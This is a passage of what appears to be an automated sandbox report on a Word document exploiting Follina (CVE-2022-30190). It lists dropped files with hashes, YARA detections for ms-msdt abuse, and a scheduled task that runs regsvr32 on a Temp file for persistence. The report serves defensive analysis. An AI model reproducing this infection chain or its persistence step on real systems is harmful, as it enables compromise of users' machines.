                                                                                                                                                                    19:20:50API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                                                                    19:23:20Task SchedulerRun new task: hxmpsgi path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t1.A"

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    No context

                                                                                                                                                                    Domains

                                                                                                                                                                    No context

                                                                                                                                                                    ASNs

                                                                                                                                                                    No context

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:Microsoft Access Database
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):528384
                                                                                                                                                                    Entropy (8bit):0.4760292021578993
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:GfTF1Mime1bj7FFFQFKFFF/FZF4F4FuBpYYI:ppA
                                                                                                                                                                    MD5:96C240AD9AC3C4EBDB7A71D235149EDA
                                                                                                                                                                    SHA1:3B01F9BE57B91D566D37F7F4F053435907E9E3CC
                                                                                                                                                                    SHA-256:31E16D22D5477F2C58BD7E55203803CC031816F89F07D94947C5D640DBBB491E
                                                                                                                                                                    SHA-512:B693CEDE21987A01CA8E3CC2E5817BCE9D115BF43BB93E66700FC0F41DB18D390F50E3B24F51E53D91A6118E66EF93019232FFF7EFCCAC9386E5CF49E649D5AF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|.....k..Y..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):36
                                                                                                                                                                    Entropy (8bit):2.730660070105504
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                    MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                    SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                    SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                    SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):1.4485360556164644
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:1f/FHaV:11Hu
                                                                                                                                                                    MD5:0B404CFE630E2EF7A1750179EA94B598
                                                                                                                                                                    SHA1:176520B4BA08A1F85A99797C1B3FA737181CF4D8
                                                                                                                                                                    SHA-256:05670DBE1D625D10B2EAB3385E176CF74682F7C6BC220885E17DE7547667F0D3
                                                                                                                                                                    SHA-512:90AB710CD730B24997C135D8FA91C66FEA99CD220D796CF48E9A33EA93F1E3BBF1D94BD4A77FDF0175EC84E472A1CA2E54B4AAC7D2015539D39217CCC04D55FA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:468325. Admin.

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\87E203A5-891F-43FE-BEFA-581865619F97

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):147863
                                                                                                                                                                    Entropy (8bit):5.3589365772806286
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:mcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:5HQ9DQW+zIXLI
                                                                                                                                                                    MD5:A9A5AE9EC5ADA3A6D5D238F6FD48D1A0
                                                                                                                                                                    SHA1:746CDEC0870A427C288F6BD8DB86BB4004631B3C
                                                                                                                                                                    SHA-256:8D3C054A45E0F7C3E39020A80883C26725E66A0263BD7FDE20DE69AF438166BD
                                                                                                                                                                    SHA-512:0A3BF3288EAB8A7990421404AD0276CF9FA90467E2BA801FA3F8E9E0BD068F8BB3A052534EC9FFB85249252EF6567BE3E585D85C4C8E16AD7F4116931177F02B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T17:21:10">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                    • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                    • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                    • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].htm (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22108
                                                                                                                                                                    Entropy (8bit):5.600449610443428
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:mtCFjsVX68/ZPK02XiySgRjultIsnonvXg3hInYMRV4NxFFq82bSTtaY0y:068/5KXXbVClt/866Dnqq8jtz
                                                                                                                                                                    MD5:B538DFB7D3FA26250E097C09F4D2882C
                                                                                                                                                                    SHA1:D27F31DE75C5C3766228ED5F215651D374184B41
                                                                                                                                                                    SHA-256:314810259AE528781087A1B3D82710BA86DE148AB2B4F2526190319E3F8E9D8C
                                                                                                                                                                    SHA-512:2DFC1E7ECF74F52D1790DB0E1E0827F32E9CF6EFFE88AD1DDA783B88C8AB597FC5AEECB2883934A7D6507506DA2AADB945D839276DACD06AB1E89CA693626EE1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:@...e...........P.......K...T.J.J.....7..............@..........H...............<@.^.L."My...:G..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3584
                                                                                                                                                                    Entropy (8bit):3.08683667520355
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:etGSks9pz1qlkCe745Q7GslPordjvX5ekjV4gztkZfRy6Iv+POBWI+ycuZhNOWas:6Ppqb927GslPmDRjyJRgk1ul5a3Vq
                                                                                                                                                                    MD5:E7C64FF6232E03C4EAFFDDCB24D61F88
                                                                                                                                                                    SHA1:F2FCB5A38F5E568D88C8CED8063CCA813EB96C08
                                                                                                                                                                    SHA-256:2D952F423B31924D5F6F3A7C54F64E92527379FF35D3A85359AA97F3A7EC8C91
                                                                                                                                                                    SHA-512:F4AC74A1D03A2D89EFA13AF3FABE47F11701CBE84F3BD630094579BF23E97C830B715333C0C0F84B3BB4153703D558FE889239EF4CEE7563FFCB1774F8AAC7F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E..b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                    Entropy (8bit):3.107637294577624
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQLWak7YnqqbLHPN5Dlq5J:+RI+ycuZhNOWakSnHPNnqX
                                                                                                                                                                    MD5:3C4ACABA50E1C037A7D43069DD50D55E
                                                                                                                                                                    SHA1:B739096A4EC05D4C531B1F45A77C2FB48965B0DA
                                                                                                                                                                    SHA-256:962732B5E808058DBBED9E8E527E0C8D3B5D91399CB3517362AEFFFD2DAFCFAD
                                                                                                                                                                    SHA-512:D48C021312417D3A95F79C97509DB6D917F83169421EF0B241D5834BD2B9569983FE3AA75F74EE61DD67D4B70E9BEA0729DBFA6FA731A628F18C5D5D5D90EBD7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.4.3.k.k.f.i.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.4.3.k.k.f.i.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES473B.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1364
                                                                                                                                                                    Entropy (8bit):4.106801882536675
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:H6C9A++fUoKB5EWDfHZhKBffuYfII+ycuZhNWgakSJFPNnq9Wd:ox8dHKZWYg1ulWga3Jfq9m
                                                                                                                                                                    MD5:F75340B901239EE7D68F2A93DE12E34C
                                                                                                                                                                    SHA1:23E76BA9651E6EB3C7B2C49C0220200AF5176F4D
                                                                                                                                                                    SHA-256:F2634B27927DAD999D7162615B98A45A5C3BA136C996A3CD0445ECB586B23B61
                                                                                                                                                                    SHA-512:566287DDEC7C85ECB62B653A7BFD080240E674BF63E572A0F38100C69CA3D93C227847EE8F855F9C45B13F73F03E8138F9E09B7B657B611433B1E272A1776CD1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:L...@..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP................(......<X..qe;Y..........4.......C:\Users\user\AppData\Local\Temp\RES473B.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.5.y.p.z.x.n...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES4765.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1364
                                                                                                                                                                    Entropy (8bit):4.09396945647647
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:H8C9A++fNsdG9DfHdhKBffuYfII+ycuZhNdakSLPNnq9Wd:GxyABLKZWYg1ulda3hq9m
                                                                                                                                                                    MD5:500DC3F5C427AB8A26D452CE585BB937
                                                                                                                                                                    SHA1:F7586DD3F23B6D4651C930D5F78128C0EFE52787
                                                                                                                                                                    SHA-256:894F109A9ADF0F1D53C6305CCB98989B18D76AE8F276C5508ACABDB479C8099D
                                                                                                                                                                    SHA-512:6448BAA46BECD305E2F09225B36A8A2EA1467EC5C6D95AD72B65AA1FC9F3AAF92F2E1BDF3156533F787D341433EA46BA102DB627E2C0C3BCE439CE75F1727CFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP.....................&.c*..PX.3..........4.......C:\Users\user\AppData\Local\Temp\RES4765.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.2.r.e.n.j.i...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES5EDA.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1364
                                                                                                                                                                    Entropy (8bit):4.09961110919796
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:HgC9A++fZeADfHwhKBffuYfII+ycuZhNOWakSnHPNnq9Wd:6xzyKZWYg1ul5a3Vq9m
                                                                                                                                                                    MD5:E7280112D4F81F7F338E7E23886C9313
                                                                                                                                                                    SHA1:1268BCB973B125C6703AF83A9833D60D8C5D0CB9
                                                                                                                                                                    SHA-256:47857740AA0BE7AFF335D2A09FAB4895958C6BA9A6D2295F11E0A6DBFBDC83B1
                                                                                                                                                                    SHA-512:656E1D6C3A183E218F0A9CD82FBBEACF18C5EEBEDB026F776BC2EDFA38902B6DF2AE85E060BAB5837003D9F0B144A75D4E67D547FFDDFF50F8C931C7CC468C4B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
